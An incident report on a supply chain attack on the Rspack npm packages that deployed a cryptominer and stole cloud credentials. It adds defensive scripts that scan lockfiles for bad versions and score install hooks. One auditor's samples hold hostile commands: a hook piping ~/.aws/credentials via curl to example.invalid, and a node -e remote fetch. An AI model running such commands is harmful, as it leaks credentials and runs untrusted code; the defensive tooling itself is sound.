Researchers uncovered a supply chain attack carried out by a threat actor labeled MUT-1692. Initially detected via a suspicious npm package (argus3-test) mimicking a legitimate tool, the investigation revealed a postinstall script that attempted to connect to a remote C2 serve...
# Incident Report: MUT-1692 Rspack Supply Chain Compromise (Cryptojacking & Credential Theft)
## Executive Summary
Threat actor MUT-1692 carried out a supply chain attack by compromising the npm credentials of a maintainer of the widely used Rspack JavaScript bundler. Using that access, the attacker published trojanized versions (v1.1.7) of `@rspack/core` and `@rspack/cli`, which deployed the XMRig cryptominer and attempted to steal cloud credentials from the developer machines and build hosts that installed them. The incident was first detected through a suspicious, lone npm package (`argus3-test`) before the broader compromise of the Rspack publishing pipeline came to light.
## Incident Details
- **Discovery Date:** April 17, 2025 (inferred from the report's publication date; the source does not state the exact day)
- **Incident Date:** Prior to April 17, 2025 (the publication date of the trojanized versions; not stated in the source)
- **Affected Organization:** Rspack Project (Maintainer accounts compromised)
- **Sector:** Software Development / Infrastructure Tools
- **Geography:** Global. Distribution was worldwide via the public npm registry; the credential-theft component specifically targeted tokens for Chinese cloud providers (Huawei Cloud, Alibaba Cloud, Tencent Cloud).
## Timeline of Events
### Initial Access
- **Date/Time:** Unknown (Pre-April 17, 2025)
- **Vector:** Compromised maintainer credentials for the npm registry (the source does not state how they were obtained; credential theft aimed at developers is the likely route).
- **Details:** MUT-1692 obtained publishing rights for the Rspack packages by taking over a maintainer's account.
### Lateral Movement
- **Date/Time:** Coordinated with package publication.
- **Vector:** Malicious package publication on the npm registry.
- **Details:** Using the compromised credentials, the attacker published trojanized versions (v1.1.7) of the legitimate `@rspack/core` and `@rspack/cli` packages. Because these are the official package names, every downstream project that resolved to v1.1.7 pulled the malicious code without any typosquatting involved.
### Data Exfiltration/Impact
- **Date/Time:** Upon execution by end-users.
- **Impact:** Deployment of XMRig cryptominer and exfiltration of cloud credentials (Huawei Cloud, Alibaba Cloud, Tencent Cloud tokens).
### Detection & Response
- **Date/Time:** April 17, 2025 (Initial detection point via suspicious independent package).
- **Detection Vector:** A suspiciously named npm package (`argus3-test`, mimicking a legitimate tool) whose `postinstall` script targeted Linux systems and attempted to reach a remote C2 server.
- **Response Actions:** The investigation that followed the `argus3-test` discovery led to the identification of the broader Rspack supply chain compromise. The source does not detail the specific containment steps taken.
## Attack Methodology
- **Initial Access:** Compromised Maintainer Account Credentials (via credential theft).
- **Persistence:** N/A (Focus on immediate execution upon installation).
- **Privilege Escalation:** N/A (Executed within the context of the build process).
- **Defense Evasion:** Code Obfuscation (Multi-stage payload began with an obfuscated Node.js script).
- **Credential Access:** Scanning local directories on the installing developer's machine or build host for stored cloud credentials.
- **Discovery:** Local file scanning for configuration data.
- **Lateral Movement:** Supply Chain Injection (Publishing malicious packages to the official registry).
- **Collection:** Targeted acquisition of cloud access tokens (Huawei, Alibaba, Tencent related).
- **Exfiltration:** Sending collected tokens to a remote server.
- **Impact:** Resource Hijacking (Cryptomining) and sensitive Cloud Credential Theft.
## Impact Assessment
- **Financial:** Resource hijacking (CPU consumed by cryptomining on developer machines and CI runners), plus the potential for significant loss if the stolen cloud credentials are used to provision resources or access victim cloud accounts.
- **Data Breach:** Sensitive cloud access tokens/credentials for multiple East Asian providers.
- **Operational:** Disruption to development pipelines relying on Rspack dependencies.
- **Reputational:** Significant reputational damage to the Rspack project due to supply chain compromise.
## Indicators of Compromise
- **Network Indicators:** Connection attempts to a remote C2 server from the `postinstall` script execution.
- **File Indicators:** Malicious package versions: `@rspack/core` (v1.1.7), `@rspack/cli` (v1.1.7).
- **Behavioral Indicators:** A `postinstall` script that fetches and executes an obfuscated Node.js payload (downloaded from GitHub) as the first stage of a multi-stage chain, followed by cryptominer deployment and scanning for cloud credential files.
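To check a repository for the package versions listed above, the following script walks an npm `package-lock.json` and reports every occurrence of a known-bad version, including nested copies that a transitive dependency pulled in. It is an added example, not code from the original report or the Rspack project; the sample lockfile embedded in it is constructed for the demonstration, and the version 1.1.8 in it stands in for a later clean release (the report only says "after 1.1.7").

```javascript
// Added example: scan an npm lockfile for the trojanized package versions
// named in the IoC list. Not code from the original report or Rspack.
const MALICIOUS_VERSIONS = {
  "@rspack/core": new Set(["1.1.7"]),
  "@rspack/cli": new Set(["1.1.7"]),
};

// lockfileVersion 2/3 keys the "packages" map by install path, e.g.
// "node_modules/@rspack/core" or, for a nested copy pulled in by another
// dependency, "node_modules/some-plugin/node_modules/@rspack/core".
function packageNameFromKey(key) {
  const idx = key.lastIndexOf("node_modules/");
  return idx === -1 ? null : key.slice(idx + "node_modules/".length);
}

function recordHit(hits, name, version, path) {
  const bad = MALICIOUS_VERSIONS[name];
  if (bad && bad.has(version)) hits.push({ name, version, path });
}

// lockfileVersion 1 nests transitive dependencies under "dependencies".
function walkV1(deps, parent, hits) {
  for (const [name, entry] of Object.entries(deps)) {
    const path = `${parent}node_modules/${name}`;
    recordHit(hits, name, entry.version, path);
    if (entry.dependencies) walkV1(entry.dependencies, `${path}/`, hits);
  }
}

// Returns every occurrence (top-level or nested) of a known-bad version.
function findMaliciousPackages(lockfile) {
  const hits = [];
  if (lockfile.packages) {
    for (const [key, entry] of Object.entries(lockfile.packages)) {
      const name = packageNameFromKey(key);
      if (name) recordHit(hits, name, entry.version, key);
    }
  } else if (lockfile.dependencies) {
    walkV1(lockfile.dependencies, "", hits);
  }
  return hits;
}

// Constructed sample lockfile (not taken from any real project). 1.1.8 stands
// in for a later clean release; the report only says "after 1.1.7".
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "0.0.0" },
    "node_modules/@rspack/core": { version: "1.1.8" },
    "node_modules/@rspack/cli": { version: "1.1.7" },
    "node_modules/some-plugin": { version: "2.0.0" },
    "node_modules/some-plugin/node_modules/@rspack/core": { version: "1.1.7" },
    "node_modules/lodash": { version: "4.17.21" },
  },
};

for (const h of findMaliciousPackages(SAMPLE_LOCKFILE)) {
  console.log(`MALICIOUS ${h.name}@${h.version} at ${h.path}`);
}
```

Checking only the top-level entry is not enough: a clean top-level `@rspack/core` can coexist with a trojanized copy nested under another package, which is why the scan keys on every install path rather than on the package name alone.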
## Response Actions
- **Containment Measures:** Removal/Quarantine of the compromised packages (`@rspack/core` v1.1.7, `@rspack/cli` v1.1.7) from the registry.
- **Eradication Steps:** Resetting and securing the compromised Rspack maintainer accounts.
- **Recovery Actions:** Publishing clean versions of the packages (version *after* 1.1.7).
## Lessons Learned
- Compromise of individual maintainer accounts poses a critical supply chain risk, regardless of project popularity.
- Dependency analysis must go beyond name-based checks (typosquatting detection) to inspection of install-time lifecycle scripts (`preinstall`, `install`, `postinstall`), which npm runs automatically with the installing user's privileges. Here the malicious versions carried the official package names, so name checks alone would have passed them.
- Cloud credentials stored on developer machines and build hosts remain a high-value target, and the tooling that is supposed to protect them (isolated build environments, short-lived tokens) is often absent in practice.
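The following script shows what "deep inspection of build-time scripts" looks like in practice: it reads package manifests, lists every install-time lifecycle hook, and scores each command with simple dropper heuristics (downloads, inline `node -e`, encoded content, credential paths). It is an added example, not code from the original report or the Rspack project; the patterns, weights and threshold are assumptions for this demonstration, and the sample manifests (with hypothetical package names) are constructed, not the actual `argus3-test` or Rspack scripts, which the report does not reproduce.

```javascript
// Added example: audit package manifests for install-time lifecycle scripts
// and score them with simple dropper heuristics. Not code from the original
// report or Rspack; the patterns, weights and threshold are assumptions.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

const RISK_PATTERNS = [
  { re: /\b(curl|wget)\b/, weight: 3, why: "downloads content at install time" },
  { re: /https?:\/\//, weight: 2, why: "hard-coded URL" },
  { re: /\bnode\s+-e\b|\beval\(/, weight: 3, why: "evaluates inline code" },
  { re: /base64|\\x[0-9a-f]{2}|fromCharCode/i, weight: 2, why: "encoded or obfuscated content" },
  { re: /\bnohup\b|\bcrontab\b|&\s*$/, weight: 2, why: "background execution or persistence" },
  { re: /\.(aws|ssh|npmrc|config\/gcloud)\b/, weight: 3, why: "touches a credential path" },
];

// One finding per install hook the manifest declares, scored by the patterns above.
function auditManifest(path, manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    let score = 0;
    const reasons = [];
    for (const p of RISK_PATTERNS) {
      if (p.re.test(cmd)) { score += p.weight; reasons.push(p.why); }
    }
    findings.push({ path, name: manifest.name, hook, cmd, score, reasons });
  }
  return findings;
}

// Splits findings into everything that runs at install time and the subset
// over the risk threshold, so a reviewer sees both lists.
function auditAll(manifests, threshold = 3) {
  const withHooks = manifests.flatMap((m) => auditManifest(m.path, m.manifest));
  return { withHooks, suspicious: withHooks.filter((f) => f.score >= threshold) };
}

// Constructed sample manifests (hypothetical package names; not the actual
// argus3-test or Rspack scripts, which the report does not reproduce).
const SAMPLE_MANIFESTS = [
  { path: "node_modules/native-addon/package.json",
    manifest: { name: "native-addon", scripts: { postinstall: "node-gyp rebuild" } } },
  { path: "node_modules/plain-lib/package.json",
    manifest: { name: "plain-lib", scripts: { test: "mocha" } } },
  { path: "node_modules/hypothetical-dropper/package.json",
    manifest: { name: "hypothetical-dropper", scripts: {
      postinstall: "node -e \"require('https').get('https://example.invalid/s.js',r=>r.pipe(process.stdout))\"" } } },
  { path: "node_modules/hypothetical-stealer/package.json",
    manifest: { name: "hypothetical-stealer", scripts: {
      install: "cat ~/.aws/credentials | base64 | curl -s -X POST https://example.invalid/c -d @-" } } },
];

const report = auditAll(SAMPLE_MANIFESTS);
for (const f of report.withHooks) {
  const tag = f.score >= 3 ? "SUSPICIOUS" : "review";
  console.log(`${tag} ${f.name} ${f.hook}: score=${f.score} ${f.reasons.join("; ")}`);
}
```

A legitimate native-addon hook such as `node-gyp rebuild` scores zero and still appears in the full list, because the point of the audit is to know every command that runs on `npm install`, not only the ones the heuristics catch. The complementary operational control is to stop running those hooks at all on developer machines and CI (`npm ci --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) and to rebuild the few packages that genuinely need a build step explicitly.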
## Recommendations
- Implement Multi-Factor Authentication (MFA) on all registry and source code repository accounts for project maintainers.
- Enforce strict code signing or verification processes for all published package versions, especially for core infrastructure tools.
- Developers should isolate build environments and utilize least-privilege principles, preventing access to local cloud tokens during general development/build operations.